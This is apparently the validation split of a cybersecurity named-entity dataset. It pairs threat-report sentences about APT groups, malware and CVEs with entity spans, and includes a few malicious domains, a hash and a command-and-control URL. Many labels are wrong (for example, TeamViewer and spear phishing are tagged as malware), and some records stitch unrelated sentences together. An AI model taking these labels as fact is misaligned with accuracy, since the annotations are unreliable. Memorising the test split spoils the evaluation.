{"text": "Secondly , it underlines their boldness , arrogance and self-confidence ; they are clearly confident in both their ability to compromise their targets even when their tools and techniques are already publicly known , and critically , they appear to be extremely confident in their ability to act with impunity . 2015 : Continuing surgical strikes with CosmicDuke .", "spans": {"Malware: CosmicDuke": [[352, 362]]}, "info": {"id": "cyberner_stix_valid_000330", "source": "cyberner_stix_valid"}}
{"text": "While doing our investigation we were able to identify other malware packages with different names . This section details changes made to APT10 tools , techniques and procedures ( TTPs ) post-2014 , following its shift from Poison Ivy to PlugX . In January 2019 , we discovered a sophisticated supply chain attack involving the ASUS Live Update Utility . The backdoor ’s primary functionality involves retrieving and executing additional modules .", "spans": {}, "info": {"id": "cyberner_stix_valid_000331", "source": "cyberner_stix_valid"}}
{"text": "But , thanks to the attackers known affection for decoy documents that pose as news summaries , we were able to date the campaign back to March 2018 . BRONZE UNION appears to use a combination of self-registered IP addresses and commercial VPN services in its command and control ( C2 ) and operational infrastructure .", "spans": {}, "info": {"id": "cyberner_stix_valid_000332", "source": "cyberner_stix_valid"}}
{"text": "Fileless execution and persistence – In targeted campaigns , threat actors often attempt to avoid writing an executable to the disk to avoid detection and forensic examination .", "spans": {}, "info": {"id": "cyberner_stix_valid_000333", "source": "cyberner_stix_valid"}}
{"text": "This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx” . At first look , it pretends to be a Java related application but after a quick analysis , it was obvious this was something more than just a simple Java file .", "spans": {"Malware: document": [[34, 42]], "Vulnerability: Trump's_Attack_on_Syria_English.docx”": [[49, 86]], "Malware: Java related application": [[125, 149]], "Indicator: Java file": [[237, 246]]}, "info": {"id": "cyberner_stix_valid_000334", "source": "cyberner_stix_valid"}}
{"text": "The macro then uses the command certutil -decode to decode the contents of this text file and outputs the decoded content to a randomly named file with a .exe extension in the C:\\Programdata folder .", "spans": {"Indicator: .exe": [[154, 158]]}, "info": {"id": "cyberner_stix_valid_000335", "source": "cyberner_stix_valid"}}
{"text": "We don’t know for sure who is responsible for this campaign , but digging into the passive DNS results led us to some breadcrumbs .", "spans": {}, "info": {"id": "cyberner_stix_valid_000336", "source": "cyberner_stix_valid"}}
{"text": "This activity ceased in February 2016 , likely because the men who made up Scattered Canary began to focus on honing their BEC skills . The second , aptly titled \" kontrakt87.doc \" , copies a generic telecommunications service contract from MegaFon , a large Russian mobile phone operator .", "spans": {"Indicator: kontrakt87.doc": [[164, 178]], "Organization: telecommunications service": [[200, 226]], "Organization: MegaFon": [[241, 248]], "Organization: mobile phone operator": [[267, 288]]}, "info": {"id": "cyberner_stix_valid_000337", "source": "cyberner_stix_valid"}}
{"text": "Some of the indicators in the following post were published on AlienVault OTX on 6/13 .", "spans": {"Organization: AlienVault": [[63, 73]]}, "info": {"id": "cyberner_stix_valid_000338", "source": "cyberner_stix_valid"}}
{"text": "Allows an application to write SMS messages . The increasing sophistication of surveillance techniques has drawn comparisons with George Orwell's 1984 , but Weeping Angel , developed by the CIA's Embedded Devices Branch (EDB) , which infests smart TVs , transforming them into covert microphones , is surely its most emblematic realization . FIN7 : Carbanak Group .", "spans": {}, "info": {"id": "cyberner_stix_valid_000339", "source": "cyberner_stix_valid"}}
{"text": "The ‘ ejtmjealr.com ’ domain is particularly interesting due to a similar domain , ‘ ejdqzkd.com ’ being discussed by Jarosław Jedynak of CERT.PL in this analysis of Nymaim from earlier in the year .", "spans": {"Indicator: ejtmjealr.com": [[6, 19]], "Indicator: ejdqzkd.com": [[85, 96]], "Organization: CERT.PL": [[138, 145]], "Malware: Nymaim": [[166, 172]]}, "info": {"id": "cyberner_stix_valid_000340", "source": "cyberner_stix_valid"}}
{"text": "Once ZeroT is running , we observed that the fake User-Agent used in the requests changed from “ Mozilla/6.0 ( compatible ; MSIE 10.0 ; Windows NT 6.2 ; Tzcdrnt/6.0 ) ” to “ Mozilla/6.0 ( compatible ; MSIE 11.0 ; Windows NT 6.2 ) ” , thus removing the “ Tzcdrnt ” typo observed in previous versions .", "spans": {"Malware: ZeroT": [[5, 10]], "System: Windows": [[136, 143], [213, 220]]}, "info": {"id": "cyberner_stix_valid_000341", "source": "cyberner_stix_valid"}}
{"text": "North Korea linked hackers are among the most prolific nation-state threats , targeting not only the U.S. and South Korea but the global financial system and nations worldwide . On Nov. 27 , 2018 , Cisco 's Talos research division published a write-up outlining the contours of a sophisticated cyber espionage campaign it dubbed DNSpionage .", "spans": {"Organization: financial": [[137, 146]], "Organization: nations": [[158, 165]], "Organization: Cisco 's Talos": [[198, 212]]}, "info": {"id": "cyberner_stix_valid_000342", "source": "cyberner_stix_valid"}}
{"text": "The LOWBALL first stage malware allows the group to collect information from victims and then deliver the BUBBLEWRAP second stage malware to their victims after verifying that they are indeed interesting targets . Using XREFs during static analysis is a common technique to quickly find where functions of interest are called .", "spans": {"Malware: XREFs": [[220, 225]]}, "info": {"id": "cyberner_stix_valid_000343", "source": "cyberner_stix_valid"}}
{"text": "Take advantage of native mitigations built into Windows 10 . The next sample was another Spindest variant and had the same timestamp as the aforementioned PcClient sample .", "spans": {"Malware: Spindest": [[89, 97]], "Malware: PcClient sample": [[155, 170]]}, "info": {"id": "cyberner_stix_valid_000344", "source": "cyberner_stix_valid"}}
{"text": "( We named the spyware \" Exodus '' after this Command & Control domain name . In December 2017 , FireEye publicly released our first analysis on the TRITON attack where malicious actors used the TRITON custom attack framework to manipulate industrial safety systems at a critical infrastructure facility and inadvertently caused a process shutdown . Executes arbitrary commands via the CMD shell . Rather than limiting security to searching for a series of stringent profiles , security teams can attempt to analyze threat indicators in real time .", "spans": {"Organization: FireEye": [[97, 104]], "Organization: security": [[419, 427]], "Organization: security teams": [[478, 492]]}, "info": {"id": "cyberner_stix_valid_000345", "source": "cyberner_stix_valid"}}
{"text": "However , it is unusual for the group to use this technique to deliver one of its malware components directly .", "spans": {}, "info": {"id": "cyberner_stix_valid_000346", "source": "cyberner_stix_valid"}}
{"text": "The Patchwork attack group has been targeting more than just government-associated organizations . The activity dates to at least 2013 and has ties to multiple reports by other researchers .", "spans": {"Organization: government-associated organizations": [[61, 96]]}, "info": {"id": "cyberner_stix_valid_000347", "source": "cyberner_stix_valid"}}
{"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . Shrouded Crossbow employs three BIFROST-derived backdoors : BIFROSE , KIVARS , and XBOW .", "spans": {"Malware: files": [[4, 9]], "Vulnerability: Microsoft Office vulnerability": [[33, 63]], "Vulnerability: CVE-2012-0158": [[66, 79]], "Malware: BIFROST-derived backdoors": [[191, 216]], "Malware: BIFROSE": [[219, 226]], "Malware: KIVARS": [[229, 235]], "Malware: XBOW": [[242, 246]]}, "info": {"id": "cyberner_stix_valid_000348", "source": "cyberner_stix_valid"}}
{"text": "Here are just some of them : ngglobal – FirebaseCloudMessaging topic name Issuer : CN = negg – from several certificates negg.ddns [ . Operation Pawn Storm is an active economic and political cyber-espionage operation that targets a wide range of entities , like the military , governments , defense industries , and the media . In August 2015 , the threat actors sent spear phishing emails to a number of Hong Kong-based media organizations , including newspapers , radio , and television .", "spans": {"Organization: economic": [[169, 177]], "Organization: political": [[182, 191]], "Organization: military": [[267, 275]], "Organization: governments": [[278, 289]], "Organization: defense industries": [[292, 310]], "Organization: media": [[321, 326]], "Organization: media organizations": [[422, 441]]}, "info": {"id": "cyberner_stix_valid_000349", "source": "cyberner_stix_valid"}}
{"text": "HammerDuke is a simple backdoor that is apparently designed for similar use cases as SeaDuke .", "spans": {"Malware: HammerDuke": [[0, 10]], "Malware: SeaDuke": [[85, 92]]}, "info": {"id": "cyberner_stix_valid_000350", "source": "cyberner_stix_valid"}}
{"text": "As researchers continued discovering new toolsets that were created and used by the same group that had been operating MiniDuke , the new toolsets were also given “ Duke ” -derived names , and thus the threat actor operating the toolsets started to be commonly referred to as “ the Dukes ” .", "spans": {"Malware: MiniDuke": [[119, 127]]}, "info": {"id": "cyberner_stix_valid_000351", "source": "cyberner_stix_valid"}}
{"text": "To be sure though , I needed to find other samples and see how they stacked up against this one .", "spans": {}, "info": {"id": "cyberner_stix_valid_000352", "source": "cyberner_stix_valid"}}
{"text": "We decided to take a peek under the hood of a modern member of the Asacub family . Much like the observers watching the shadows of objects cast upon the wall of the cave , these two definitions ( XENOTIME and TEMP.Veles , both presumably referring to \" the TRITON actor \" ) describe the same phenomena , yet at the same time appear different . Outlaw Updates Kit to Kill Older Miner Versions , Targets More Systems . PIEHOP utilizes LIGHTWORK to execute the IEC-104 commands \" ON ” or \" OFF \" on the remote system and immediately deletes the executable after issuing the commands .", "spans": {"Malware: Asacub": [[67, 73]]}, "info": {"id": "cyberner_stix_valid_000353", "source": "cyberner_stix_valid"}}
{"text": "According to RiskIQ ’ s PassiveTotal , the domain expired 7 months ago . The Leafminer 's post-compromise toolkit suggests that Leafminer is looking for email data , files , and database servers on compromised target systems . TA549 possesses a diverse malware arsenal including PlugX , NetTraveler , and ZeroT .", "spans": {"System: RiskIQ": [[13, 19]], "Malware: PlugX": [[279, 284]], "Malware: NetTraveler": [[287, 298]], "Malware: ZeroT": [[305, 310]]}, "info": {"id": "cyberner_stix_valid_000354", "source": "cyberner_stix_valid"}}
{"text": "These incidents show a novel infection vector being used by APT28 .", "spans": {}, "info": {"id": "cyberner_stix_valid_000355", "source": "cyberner_stix_valid"}}
{"text": "If Arabic keyboard and language settings are not found on the machine , the backdoor will not carry out its malicious activity .", "spans": {}, "info": {"id": "cyberner_stix_valid_000356", "source": "cyberner_stix_valid"}}
{"text": "The Spark payload is a custom backdoor likely developed by the MoleRATs group .", "spans": {"Malware: Spark": [[4, 9]]}, "info": {"id": "cyberner_stix_valid_000357", "source": "cyberner_stix_valid"}}
{"text": "Since Android version 7 ( Nougat ) this information is gathered using other means , perhaps inferring the devices used by potential victim run older versions of Android . In a highly unusual case , APT41 attempted to extort a game company by deploying the Encryptor RaaS ransomware . We have reasons to believe that the operators of the APT28 network are either Russian citizens or citizens of a neighboring country that speak Russian .", "spans": {"System: Android": [[6, 13], [161, 168]], "System: Nougat": [[26, 32]], "Organization: citizens": [[370, 378], [382, 390]]}, "info": {"id": "cyberner_stix_valid_000358", "source": "cyberner_stix_valid"}}
{"text": "The Shadow Brokers have long claimed that the tools they release are from the \" Equation Group \" , the name of a government hacking group outed by Kaspersky Lab in 2015 , which is widely believed to be the NSA . The actors behind LUCKY ELEPHANT recognize the effectiveness and use doppelganger webpages nearly identical to legitimate sites , enticing users to input their credentials . The heavier targeting in Pakistan adheres to historical targeting and the ongoing tension between the two countries , which has escalated since a terrorist attack in Kashmir on 14 February 2019 . The targeting of Pakistan , Bangladesh , Sri Lanka , Maldives , Myanmar , Nepal , and the Shanghai Cooperation Organization are all historical espionage targets by India . However , it is clear is that Donot are actively establishing infrastructure and are targeting governments in South Asia . First attack of this campaign took place in May 2018 . Arbor also published APT research on this group , and named it ‘Donot’ . Donot attacked government agencies , aiming for classified intelligence . We identified this APT group coded as ‘APT-C-35’ in 2017 , who is mainly targeting Pakistan and other South Asian countries for Cyber Espionage . At least 4 attack campaigns against Pakistan have been observed by us since 2017 . Spear phishing emails with vulnerable Office documents or malicious macros are sent to victims . In the latest attack , Donot group is targeting Pakistani businessman working in China . Two unique malware frameworks , EHDevel and yty , are developed by attackers . wuaupdt.exe is a CMD backdoor , which can receive and execute CMD commands sent from C2 . Furthermore , it has similar code logic as previous ones wuaupdt.exe in this attack appears in previous Donot attack , and C2 addresses are same to previous ones . From the attack activity captured this time , it is obvious that Donot APT group is still keen on Pakistan as primary target of attack , and even expands scope of attack to include Pakistani staffs and institutions in China . Buhtrap still make extensive use of NSIS installers as droppers and these are mainly delivered through malicious documents . They first came to light in 2016 , when they managed to steal sensitive information from the US Democratic National Committee (DNC) . Earworm first came to light in 2016 , when they managed to steal sensitive information from the US Democratic National Committee (DNC) . They were also behind an attack on the World Anti-Doping Agency (WADA) , in which they leaked confidential information about several drug tests . SPLM , GAMEFISH , and Zebrocy delivery all maintain their own clusters , but frequently overlap later . Our previous post on Sofacy's 2017 activity stepped aACT from the previously covered headline buzz presenting their association with previously known political hacks and interest in Europe and the US , and examines their under-reported ongoing activity in middle east , central asia , and now a shift in targeting further east , including China , along with an overlap surprise . The larger , 300kb+ SPLM backdoors deployed in 2016 and 2017 are not observed any longer at targets in 2018 . A previous , removed , report from another vendor claimed non-specific information about the groups' interest in Chinese universities , but that report has been removed – most likely detections were related to students’ and researchers’ scanning known collected samples and any incidents” remain unconfirmed and unknown . Either ACT , the group's consistent activity throughout central and eastern asia seems to be poorly represented in the public discussion . The actors behind this campaign we call LUCKY ELEPHANT use doppelganger webpages to mimic legitimate entities such as foreign governments , telecommunications , and military . Currently , Sofacy targets large air-defense related commercial organizations in China with SPLM , and moves Zebrocy focus across Armenia , Turkey , Kazahkstan , Tajikistan , Afghanistan , Mongolia , China , and Japan . Either ACT , Sofacy's consistent activity throughout central and eastern asia seems to be poorly represented in the public discussion . According to this new alert , Hidden Cobra the U.S. government’s code name for Lazarus has been conducting FASTCash attacks stealing money from Automated Teller Machines (ATMs) from banks in Asia and Africa since at least 2016 . Lazarus is a very active attack group involved in both cyber crime and espionage . The group was initially known for its espionage operations and a number of high-profile disruptive attacks , including the 2014 attack on Sony Pictures . Following US-CERTs report , Symantec's research uncovered the key component used in Lazarus's recent wave of financial attacks . More recently , Lazarus has also become involved in financially motivated attacks , including an US$81 million dollar theft from the Bangladesh Central Bank and the WannaCry ransomware . Other open source and semi-legitimate pen-testing tools like nbtscan and powercat are being used for mapping available resources and lateral movement as well . To make the fraudulent withdrawals , Lazarus first breaches targeted banks' networks and compromises the switch application servers handling ATM transactions . The operation , known as FASTCash” has enabled Lazarus to fraudulently empty ATMs of cash . In order to permit their fraudulent withdrawals from ATMs , Lazarus inject a malicious Advanced Interactive eXecutive (AIX) executable into a running , legitimate process on the switch application server of a financial transaction network , in this case a network handling ATM transactions . It was previously believed that the attackers used scripts to manipulate legitimate software on the server into enabling the fraudulent activity . In recent years , Lazarus has also become involved in financially motivated attacks . This malware in turn intercepts fraudulent Lazarus cash withdrawal requests and sends fake approval responses , allowing the attackers to steal cash from ATMs . Lazarus was linked to the $81 million theft from the Bangladesh central bank in 2016 , along with a number of other bank heists . Lazarus was also linked to the WannaCry ransomware outbreak in May 2017 . WannaCry incorporated the leaked EternalBlue exploit that used two known vulnerabilities in Windows CVE-2017-0144 and CVE-2017-0145 to turn the ransomware into a worm , capable of spreading itself to any unpatched computers on the victim's network and also to other vulnerable computers connected to the internet . Lazarus was initially known for its involvement in espionage operations and a number of high-profile disruptive attacks , including the 2014 attack on Sony Pictures that saw large amounts of information being stolen and computers wiped by malware . In short , Lazarus continues to pose a serious threat to the financial sector and organizations should take all necessary steps to ensure that their payment systems are fully up to date and secured . As with the 2016 series of virtual bank heists , including the Bangladesh Bank heist , FASTCash illustrates that Lazarus possesses an in-depth knowledge of banking systems and transaction processing protocols and has the expertise to leverage that knowledge in order to steal large sums from vulnerable banks . The attack , which starts with a malicious attachment disguised as a top secret US document , weaponizes TeamViewer , the popular remote access and desktop sharing software , to gain full control of the infected computer . As described in the infection flow , one of the first uses of the AutoHotKey scripts is to upload a screenshot from the compromised PC . It is hard to tell if there are geopolitical motives behind this campaign by looking solely at the list of countries it was targeting , since it was not after a specific region and the victims came from different places in the world . The initial infection vector used by the threat actor also changed over time , during 2018 we have seen multiple uses of self-extracting archives instead of malicious documents with AutoHotKey , which displayed a decoy image to the user . The recent wave of FASTCash attacks demonstrates that financially motivated attacks are not simply a passing interest for the Lazarus group and can now be considered one of its core activities . Although both examples of the different delivery methods described above show an exclusive targeting of Russian speakers , the recurring financial and political themes that they use highlight the attacker's interest in the financial world once more . Throughout our investigation , we have found evidence that shows operational similarities between this implant and Gamaredon Group . Gamaredon Group is an alleged Russian threat group . Gamaredon Group has been active since at least 2013 , and has targeted individuals likely involved with the Ukrainian government . EvilGnome's functionalities include desktop screenshots , file stealing , allowing capturing audio recording from the user’s microphone and the ability to download and execute further modules . Gamaredon Group primarily makes use of Russian hosting providers in order to distribute its malware . Gamaredon Group's implants are characterized by the employment of information stealing tools — among them being screenshot and document stealers delivered via a SFX , and made to achieve persistence through a scheduled task . Gamaredon Group infects victims using malicious attachments , delivered via spear phishing techniques . The techniques and modules employed by EvilGnome — that is the use of SFX , persistence with task scheduler and the deployment of information stealing tools—remind us of Gamaredon Group’s Windows tools . We can observe that the sample is very recent , created on Thursday , July 4 . As can be observed in the illustration above , the makeself script is instructed to run ./setup.sh after unpacking . The ShooterAudio module uses PulseAudio to capture audio from the user's microphone . makeself.sh is a small shell script that generates a self-extractable compressed tar archive from a directory . During our 2018 monitoring of this group , we were able to identify different techniques utilized by very similar attackers in the MENA region , sometimes on the same target . Gaza Cybergang Group3 (highest sophistication) whose activities previously went by the name Operation Parliament . Gaza Cybergang has been seen employing phishing , with several chained stages to evade detection and extend command and control server lifetimes . The most popular targets of SneakyPastes are embassies , government entities , education , media outlets , journalists , activists , political parties or personnel , healthcare and banking . Through our continuous monitoring of threats during 2018 , we observed a new wave of attacks by Gaza Cybergang Group1 targeting embassies and political personnel . Gaza Cybergang Group1 is an attack group with limited infrastructure and an open-source type of toolset , which conducts widespread attacks , but is nevertheless focused on Palestinian political problems . In this campaign , Gaza Cybergang used disposable emails and domains as the phishing platform to target the victims . The RAT , however , had a multitude of functionalities (as listed in the table below) such as to download and execute , compress , encrypt , upload , search directories , etc . We expect the damage caused by these groups to intensify and the attacks to extend into other regions that are also linked to the complicated Palestinian situation . Cylance determined that the ‘Ghost Dragon’ group utilized specifically tailored variants of Gh0st RAT , which the group modified from the 3.6 version of the source code released in 2008 . The standard network protocol for Gh0st RAT 3.6 employs zlib compression , which utilizes ‘Gh0st’ as a static five-byte packet flag that must be included in the first five bytes of initial transmission from the victim . In a more recent version of the modified Gh0st RAT malware , Ghost Dragon implemented dynamic packet flags which change the first five bytes of the header in every login request with the controller . SPEAR has observed numerous different XOR keys utilized by Ghost Dragon . exploit and tools continued to be used after Buckeye's apparent disappearance in 2017 . The Buckeye attack group was using Equation Group tools to gain persistent access to target organizations at least a year prior to the Shadow Brokers leak . Buckeye's use of Equation Group tools also involved the exploit of a previously unknown Windows zero-day vulnerability . While Buckeye appeared to cease operations in mid-2017 , the Equation Group tools it used continued to be used in attacks until late 2018 . The 2017 leak of Equation Group tools by a mysterious group calling itself the Shadow Brokers was one of the most significant cyber security stories in recent years. However , Symantec has now found evidence that the Buckeye Cyber Espionage group (aka APT3 , Gothic Panda ) began using Equation Group tools in attacks at least a year prior to the Shadow Brokers leak . Equation is regarded as one of the most technically adept espionage groups and the release of a trove of its tools had a major impact , with many attackers rushing to deploy the malware and exploits disclosed . DoublePulsar was delivered to victims using a custom exploit tool (Trojan.Bemstour) that was specifically designed to install DoublePulsar . One vulnerability is a Windows zero-day vulnerability (CVE-2019-0703) discovered by Symantec . Bemstour exploits two Windows vulnerabilities in order to achieve remote kernel code execution on targeted computers .", "spans": {"Organization: Kaspersky Lab": [[147, 160]], "Organization: NSA": [[206, 209]], "Malware: doppelganger webpages": [[281, 302], [3709, 3730]], "Organization: Shanghai Cooperation Organization": [[672, 705]], "Organization: Arbor": [[932, 937]], "Organization: government agencies": [[1020, 1039]], "Malware: Spear phishing": [[1308, 1322]], "Organization: Pakistani businessman": [[1453, 1474]], "Malware: EHDevel": [[1526, 1533]], "Malware: yty": [[1538, 1541]], "Indicator: wuaupdt.exe": [[1573, 1584], [1720, 1731]], "Malware: CMD backdoor": [[1590, 1602]], "Organization: (DNC)": [[2304, 2309], [2441, 2446]], "Organization: (WADA)": [[2513, 2519]], "Organization: Chinese universities": [[3302, 3322]], "Organization: foreign governments": [[3768, 3787]], "Organization: telecommunications": [[3790, 3808]], "Organization: military": [[3815, 3823]], "Organization: banks": [[4364, 4369]], "Organization: financial": [[4757, 4766], [8593, 8602]], "Organization: Bangladesh Central Bank": [[4910, 4933]], "Malware: WannaCry": [[4942, 4950]], "Indicator: nbtscan": [[5025, 5032]], "Indicator: powercat": [[5037, 5045]], "Organization: banks'": [[5193, 5199]], "Malware: (AIX)": [[5494, 5499]], "Malware: scripts": [[5719, 5726]], "Organization: financially": [[5869, 5880]], "Malware: malware": [[5906, 5913], [9224, 9231]], "Organization: Bangladesh central bank": [[6115, 6138]], "Vulnerability: EternalBlue": [[6299, 6310]], "Vulnerability: exploit": [[6311, 6318], [12304, 12311], [12605, 12612]], "System: Windows": [[6358, 6365], [12637, 12644], [13554, 13561], [13648, 13655]], "Vulnerability: CVE-2017-0144": [[6366, 6379]], "Vulnerability: CVE-2017-0145": [[6384, 6397]], "Organization: financial sector": [[6891, 6907]], "Organization: FASTCash": [[7117, 7125]], "Malware: TeamViewer": [[7446, 7456]], "Indicator: AutoHotKey scripts": [[7630, 7648]], "Malware: archives": [[8073, 8081]], "Malware: decoy image": [[8149, 8160]], "Indicator: implant": [[8724, 8731]], "Organization: Ukrainian government": [[8915, 8935]], "Malware: desktop screenshots": [[8974, 8993]], "Malware: file stealing": [[8996, 9009]], "Malware: capturing audio recording": [[9021, 9046]], "Malware: information stealing tools": [[9300, 9326]], "Malware: malicious attachments": [[9498, 9519]], "Malware: SFX": [[9634, 9637]], "Indicator: Windows tools": [[9752, 9765]], "Indicator: sample": [[9792, 9798]], "Indicator: makeself script": [[9898, 9913]], "Indicator: ./setup.sh": [[9935, 9945]], "Indicator: ShooterAudio module": [[9968, 9987]], "Malware: PulseAudio": [[9993, 10003]], "Indicator: makeself.sh": [[10050, 10061]], "Indicator: shell script": [[10073, 10085]], "Organization: embassies": [[10645, 10654], [10919, 10928]], "Organization: government entities": [[10657, 10676]], "Organization: education": [[10679, 10688]], "Organization: media outlets": [[10691, 10704]], "Organization: activists": [[10721, 10730]], "Organization: personnel": [[10754, 10763]], "Organization: healthcare": [[10766, 10776]], "Organization: banking": [[10781, 10788]], "Organization: political personnel": [[10933, 10952]], "Organization: Palestinian": [[11128, 11139]], "Indicator: RAT": [[11283, 11286]], "Organization: complicated Palestinian situation": [[11586, 11619]], "Organization: Cylance": [[11622, 11629]], "Malware: Gh0st RAT": [[11714, 11723]], "Malware: zlib compression": [[11866, 11882]], "Indicator: Gh0st RAT": [[12071, 12080]], "Malware: Equation Group tools": [[12427, 12447], [12731, 12751], [13096, 13116]], "Organization: Symantec": [[12986, 12994], [13615, 13623]], "Malware: trove": [[13275, 13280]], "Malware: exploit tool": [[13443, 13455]], "Vulnerability: zero-day": [[13562, 13570]], "Vulnerability: vulnerabilities": [[13656, 13671]]}, "info": {"id": "cyberner_stix_valid_000359", "source": "cyberner_stix_valid"}}
{"text": "Whitefly is a highly adept group with a large arsenal of tools at its disposal , capable of penetrating targeted organizations and maintaining a long-term presence on their networks . According to FireEye , the attackers sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL .", "spans": {"Organization: FireEye": [[197, 204]], "Vulnerability: exploit": [[280, 287]], "Organization: Microsoft Office": [[288, 304]], "Vulnerability: vulnerabilities": [[305, 320]], "Malware: LOWBALL": [[371, 378]]}, "info": {"id": "cyberner_stix_valid_000360", "source": "cyberner_stix_valid"}}
{"text": "Ensuring that applications and operating systems are patched with the latest updates greatly reduces the number of exploitable entry points available to an attacker .", "spans": {}, "info": {"id": "cyberner_stix_valid_000361", "source": "cyberner_stix_valid"}}
{"text": "The group conducts operations primarily in the Middle East , targeting financial , government , energy , chemical , telecommunications and other industries . The functionalities are similar to the malicious app provided , which includes installing tor and proxy .", "spans": {"Organization: financial": [[71, 80]], "Organization: government": [[83, 93]], "Organization: energy": [[96, 102]], "Organization: chemical": [[105, 113]], "Organization: telecommunications": [[116, 134]], "Malware: malicious app": [[197, 210]]}, "info": {"id": "cyberner_stix_valid_000362", "source": "cyberner_stix_valid"}}
{"text": "On August 23 , 2017 , DHS published a Malware Analysis Report ( MAR-10132963 ) that examines malware functionality to provide detailed code analysis and insight into specific tactics , techniques , and procedures ( TTPs ) observed in the malware .", "spans": {"Organization: DHS": [[22, 25]]}, "info": {"id": "cyberner_stix_valid_000363", "source": "cyberner_stix_valid"}}
{"text": "Pony is a fairly common malware family that has existed in various forms since 2012 , with our first indications of Nigerian use occurring in August 2014 . The initial attack vector used in the attack against the data center is unclear , but researchers believe LuckyMouse possibly had conducted watering hole or phishing attacks to compromise accounts belonging to employees at the national data center .", "spans": {"Organization: employees": [[366, 375]]}, "info": {"id": "cyberner_stix_valid_000364", "source": "cyberner_stix_valid"}}
{"text": "] commargaery [ . This documentation provides new insight into intrusion efforts conducted by at least four discrete Iranian threat actors , Rocket Kitten , Infy , Sima , and Operation Cleaver , including groups and tools that have not been previously disclosed . In the same way that people program named contacts into their cell phones and no longer need to remember phone numbers , DNS allows people to remember names like “ google.com ” instead of IP addresses . Tarrask is able to create \" hidden \" scheduled tasks by deleting the Security Descriptor ( SD ) registry value.[9 ] WarzoneRAT can masquerade the Process Environment Block on a compromised host to hide it 's attempts to elevate privileges through IFileOperation .", "spans": {"Indicator: google.com": [[428, 438]], "Malware: WarzoneRAT": [[583, 593]]}, "info": {"id": "cyberner_stix_valid_000365", "source": "cyberner_stix_valid"}}
{"text": "The Tibetan community has been targeted for over a decade by espionage operations that use malware to infiltrate communications and gather information . If the OwaAuth web shell is ineffective because the victim uses two-factor authentication for webmail , TG-3390 identify other externally accessible servers and deploy ChinaChopper web shells .", "spans": {"Organization: Tibetan community": [[4, 21]], "Malware: OwaAuth web shell": [[160, 177]]}, "info": {"id": "cyberner_stix_valid_000366", "source": "cyberner_stix_valid"}}
{"text": "To retrieve IP addresses that have ARP entries , Ryuk calls GetIpNetTable . ScarCruft has several ongoing operations , utilizing multiple exploits — two for Adobe Flash and one for Microsoft Internet Explorer .", "spans": {"Malware: Adobe Flash": [[157, 168]], "Malware: Microsoft Internet Explorer": [[181, 208]]}, "info": {"id": "cyberner_stix_valid_000367", "source": "cyberner_stix_valid"}}
{"text": "For instance , in the case of the “ Execute ” opcode ( 0x17 ) , the 32-bit code to run is stored entirely into the variable section with the value at offset 5 specifying the number of bytes to be copied and executed . Link analysis of infrastructure and tools also revealed a potential relationship between Magic Hound and the adversary group called \" Rocket Kitten \" ( AKA Operation Saffron Rose , Ajax Security Team , Operation Woolen-Goldfish ) as well as an older attack campaign called Newscasters . Winnti : a260dcf193e747cee49ae83568eea6c04bf93cb3 https://bugcheck.xigncodeservice.com/Common/Lib/Common_Include.php . DDoS and MiTM Attacks Any anomalous increase in traffic or redirect through unrecognized external servers can be an indication of a cyberattack that s about to happen .", "spans": {"Indicator: a260dcf193e747cee49ae83568eea6c04bf93cb3": [[514, 554]], "Indicator: https://bugcheck.xigncodeservice.com/Common/Lib/Common_Include.php": [[555, 621]]}, "info": {"id": "cyberner_stix_valid_000368", "source": "cyberner_stix_valid"}}
{"text": "Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) . In 2017 , the same entities that were affected by the Okrum malware and by the 2015 Ketrican backdoors again became targets of the malicious actors .", "spans": {"Vulnerability: Java zero-day vulnerability": [[30, 57]], "Vulnerability: CVE-2012-4681": [[60, 73]], "Malware: Microsoft Word": [[119, 133]], "Vulnerability: CVE-2010-3333": [[136, 149]], "Vulnerability: CVE-2010-2883": [[175, 188]], "Indicator: Okrum malware": [[247, 260]], "Indicator: Ketrican backdoors": [[277, 295]]}, "info": {"id": "cyberner_stix_valid_000369", "source": "cyberner_stix_valid"}}
{"text": "Tropic Trooper is also still exploiting CVE-2012-0158 , as are many threat actors . The Winnti umbrella and linked groups' initial targets are gaming studios and high tech businesses .", "spans": {"Vulnerability: CVE-2012-0158": [[40, 53]], "Malware: Winnti": [[88, 94]], "Organization: gaming studios": [[143, 157]], "Organization: high tech businesses": [[162, 182]]}, "info": {"id": "cyberner_stix_valid_000370", "source": "cyberner_stix_valid"}}
{"text": "] com are or were intended for malicious use . According to our telemetry , the campaign spreading these tools has been live since 2016 , with the most recent detections as late as in July 2019 . Cybereason also attributes the recently reported Backdoor.Win32.Denis to the OceanLotus Group , which at the time of this report 's writing , had not been officially linked to this threat actor .", "spans": {"Organization: Cybereason": [[196, 206]], "Malware: Backdoor.Win32.Denis": [[245, 265]]}, "info": {"id": "cyberner_stix_valid_000371", "source": "cyberner_stix_valid"}}
{"text": "First ( start ) module The first module , which was installed on the targeted device , could be controlled over the IRC protocol and enable deployment of other components by downloading a payload from the FTP server : @ install command As can be seen from the screenshot above , a new component was copied in the system path , though that sort of operation is impossible without root privileges . Based on our analysis of public and private information from submissions , along with product telemetry , it appears Proxysvc was used alongside the 2017 Destover variant and has operated undetected since mid-2017 . Elfin is one of the most active groups currently operating in the Middle East , targeting a large number of organizations across a diverse range of sectors . The malware is designed to cause electric power disruption by interacting with IEC 60870 - 5 - 104 ( IEC-104 ) devices , such as remote terminal units ( RTUs ) , that are commonly leveraged in electric transmission and distribution operations in Europe , the Middle East , and Asia .", "spans": {}, "info": {"id": "cyberner_stix_valid_000372", "source": "cyberner_stix_valid"}}
{"text": "An example of the string which is sent to the command-and-control would be “ phone 26.03.2013 ” . Even when we observed LuckyMouse using weaponized documents with CVE-2017-11882 ( Microsoft Office Equation Editor , widely used by Chinese-speaking actors since December 2017 ) , we can′t prove they were related to this particular attack . NEODYMIUM also used the exact same CVE-2016-4117 exploit code that PROMETHIUM used , prior to public knowledge of the vulnerability 's existence .", "spans": {"Vulnerability: CVE-2017-11882": [[163, 177]], "Vulnerability: CVE-2016-4117": [[374, 387]], "Vulnerability: exploit": [[388, 395]]}, "info": {"id": "cyberner_stix_valid_000373", "source": "cyberner_stix_valid"}}
